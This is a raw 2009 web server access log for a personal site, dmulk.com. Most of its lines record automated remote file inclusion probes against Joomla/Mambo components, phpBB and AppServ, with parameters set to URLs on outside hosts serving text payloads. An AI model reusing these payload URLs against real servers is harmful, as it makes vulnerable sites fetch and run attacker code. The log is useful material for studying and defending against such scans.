59.24.49.35 - - [07/Sep/2009:11:32:46 -0700] "GET /logs/access_080530.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:32:46 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.43 - - [07/Sep/2009:11:32:46 -0700] "POST /blog/wp-cron.php?doing_wp_cron HTTP/1.0" 200 1 "-" "WordPress/2.8.4; http://dmulk.com/blog" "dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:32:47 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 19836 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:32:48 -0700] "GET /logs//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:32:48 -0700] "GET /logs/access_080530.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:32:48 -0700] "GET /index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 200 19836 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:32:58 -0700] "GET /logs/access_080611.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:33:07 -0700] "GET /logs/access_071220.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:33:13 -0700] "GET /logs/access_080531.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:33:13 -0700] "GET /logs/access_080531.log//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:33:30 -0700] "GET /logs/access_071008.log HTTP/1.0" 200 53442 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:33:47 -0700] "GET /logs/access_090413.log HTTP/1.0" 200 65536 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:34:08 -0700] "GET /bikes/dteel/2008_01_26/ HTTP/1.0" 200 6600 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:34:17 -0700] "GET /logs/access_090326.log//appserv/main.php?appserv_root=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
87.118.116.55 - - [07/Sep/2009:11:34:26 -0700] "GET /logs//embed/day.php?path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.118.116.55 - - [07/Sep/2009:11:34:26 -0700] "GET /embed/day.php?path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
87.118.116.55 - - [07/Sep/2009:11:34:27 -0700] "GET /logs/scriptsold.log%20%20//embed/day.php?path=http://audaz.beepworld.it/files/id1.txt??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:34:30 -0700] "GET /logs/access_081107.log//appserv/main.php?appserv_root=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:34:30 -0700] "GET /appserv/main.php?appserv_root=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
97.83.114.220 - - [07/Sep/2009:11:34:30 -0700] "GET /logs//appserv/main.php?appserv_root=http://www.avanceinternet.com/installationBAK/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:34:41 -0700] "GET /logs/access_070626.log HTTP/1.0" 200 32190 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:06 -0700] "GET /logs/access_090330.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:06 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:06 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:07 -0700] "GET /logs/access_090330.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:07 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:07 -0700] "GET /logs/access_090330.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:07 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:07 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:07 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:13 -0700] "GET /logs/access_090330.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:13 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:13 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:14 -0700] "GET /logs/access_090330.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:14 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:14 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:21 -0700] "GET /component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:21 -0700] "GET /logs/access_080326.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:21 -0700] "GET /logs/access_090514.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:21 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
222.239.227.142 - - [07/Sep/2009:11:35:21 -0700] "GET /logs/access_090108.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:22 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:22 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:23 -0700] "GET /logs/access_090330.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:23 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:24 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:24 -0700] "GET /logs/access_090330.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:30 -0700] "GET /logs/access_090108.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:31 -0700] "GET /component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:31 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:31 -0700] "GET /logs/access_090514.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:35:31 -0700] "GET /logs/access_080326.log%20%20//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:35:32 -0700] "GET /bikes/dteel/2008_08_17/ HTTP/1.0" 200 983 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:35:36 -0700] "GET /logs/access_090108.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:35:42 -0700] "GET /logs/access_080723.log%20%20/?DOCUMENT_ROOT=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:35:42 -0700] "GET /logs/?DOCUMENT_ROOT=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:35:42 -0700] "GET /?DOCUMENT_ROOT=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:35:49 -0700] "GET /logs/access_080128.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
174.143.3.188 - - [07/Sep/2009:11:36:06 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (compatible; Konqueror/3.1-rc3; i686 Linux; 20020515)" "www.dmulk.com"
174.143.3.188 - - [07/Sep/2009:11:36:06 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=? HTTP/1.1" 404 275 "-" "Mozilla/3.0 (OS/2; U)" "www.dmulk.com"
174.143.3.188 - - [07/Sep/2009:11:36:06 -0700] "GET /administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (X11; U; FreeBSD i386; en-US; rv:1.7.8) Gecko/20050609 Firefox/1.0.4" "www.dmulk.com"
174.143.3.188 - - [07/Sep/2009:11:36:06 -0700] "GET /logs/administrator/components/com_multibanners/extadminmenus.class.php?mosConfig_absolute_path=http://62.204.110.243/newscans.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0 (Macintosh; U; PPC Mac OS X Mach-O; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7" "www.dmulk.com"
218.38.34.182 - - [07/Sep/2009:11:36:34 -0700] "GET /logs/access_081010.log%20/?DOCUMENT_ROOT=http://203.113.6.34/id/ManieZ.jpg??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:36:43 -0700] "GET /logs/access_070708.log HTTP/1.0" 200 169855 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
200.204.51.161 - - [07/Sep/2009:11:37:01 -0700] "GET /logs/access_081027.log//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.campani.net/logs/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.204.51.161 - - [07/Sep/2009:11:37:01 -0700] "GET /s_loadenv.inc.php?DOCUMENT_ROOT=http://www.campani.net/logs/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
200.204.51.161 - - [07/Sep/2009:11:37:02 -0700] "GET /logs//s_loadenv.inc.php?DOCUMENT_ROOT=http://www.campani.net/logs/pw.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:02 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:02 -0700] "GET /component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:02 -0700] "GET /logs/access_090514.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:02 -0700] "GET /logs/access_080326.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:03 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:03 -0700] "GET /logs/access_090321.log%20%20/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:04 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:04 -0700] "GET /?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19915 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:07 -0700] "GET /component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:07 -0700] "GET /logs//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:07 -0700] "GET /logs/access_090514.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:09 -0700] "GET /logs/access_090321.log/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:09 -0700] "GET /logs/?DOCUMENT_ROOT=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:11 -0700] "GET /logs/access_090321.log/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:11 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:12 -0700] "GET /logs/access_080326.log//component/com_events/includes/comutils.php?mosConfig_absolute_path=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:19 -0700] "GET /logs/access_080716.log/?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:19 -0700] "GET /logs/access_080616.log/?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:19 -0700] "GET /?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 200 19893 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:19 -0700] "GET /logs/?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 200 116204 "-" "libwww-perl/5.79" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:25 -0700] "GET /logs/access_090321.log%20%20/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:25 -0700] "GET /logs/access_080716.log/?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:25 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 116204 "-" "Mozilla/5.0" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:25 -0700] "GET /logs/access_080616.log/?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:25 -0700] "GET /?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 200 19893 "-" "libwww-perl/5.79" "www.dmulk.com"
61.47.7.71 - - [07/Sep/2009:11:37:25 -0700] "GET /logs/?phpbb_root_path=http://dancok.wen.ru/id.txt??? HTTP/1.1" 200 116204 "-" "libwww-perl/5.79" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:27 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:27 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:27 -0700] "GET /logs/access_090604.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:27 -0700] "GET /logs/access_080204.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:37:29 -0700] "GET /logs/access_080425.log HTTP/1.0" 200 0 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:29 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:29 -0700] "GET /logs/access_080318.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:29 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:31 -0700] "GET /logs/access_090604.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:31 -0700] "GET /logs/access_080204.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:31 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:31 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:31 -0700] "GET /administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:31 -0700] "GET /logs/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.185.129.45 - - [07/Sep/2009:11:37:31 -0700] "GET /logs/access_080318.log/administrator/components/com_admin/admin.admin.html.php?mosConfig_absolute_path=http://www.sangrokwon.or.kr/bbs/icon/private_icon/1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
92.50.143.90 - - [07/Sep/2009:11:37:33 -0700] "GET /?INCLUDE_FOLDER=http://www.pampa.hu/administrator/templates/id.txt?? HTTP/1.1" 200 19916 "-" "Mozilla/5.0" "www.dmulk.com"
67.195.112.160 - - [07/Sep/2009:11:37:37 -0700] "GET /bikes/dteel/2008_02_16/ HTTP/1.0" 200 1680 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
204.30.3.225 - - [07/Sep/2009:11:37:48 -0700] "GET /logs/access_080723.log/?DOCUMENT_ROOT=http://amelebirligi.gov.tr/images/icons/fxid1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:37:50 -0700] "GET /logs/access_080601.log//components/com_smf/smf.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:37:50 -0700] "GET /components/com_smf/smf.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
211.40.68.132 - - [07/Sep/2009:11:37:51 -0700] "GET /logs//components/com_smf/smf.php?mosConfig_absolute_path=http://samhwaeng.com/bbs/skin/ruvin_cubic_l3/id.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
190.144.44.36 - - [07/Sep/2009:11:37:57 -0700] "GET /logs/access_080313.log//com_directory/modules/mod_pxt_latest.php?GLOBALS[mosConfig_absolute_path]=http://www.kim-key.cn/bbs/data/id1.txt???? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:38:07 -0700] "GET /logs/access_080530.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
59.24.49.35 - - [07/Sep/2009:11:38:09 -0700] "GET /logs/access_080530.log%20%20//index.php?option=com_linkdirectory&Itemid=&mosConfig_absolute_path=http://www.cyber-marche.fr/media/fx29id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
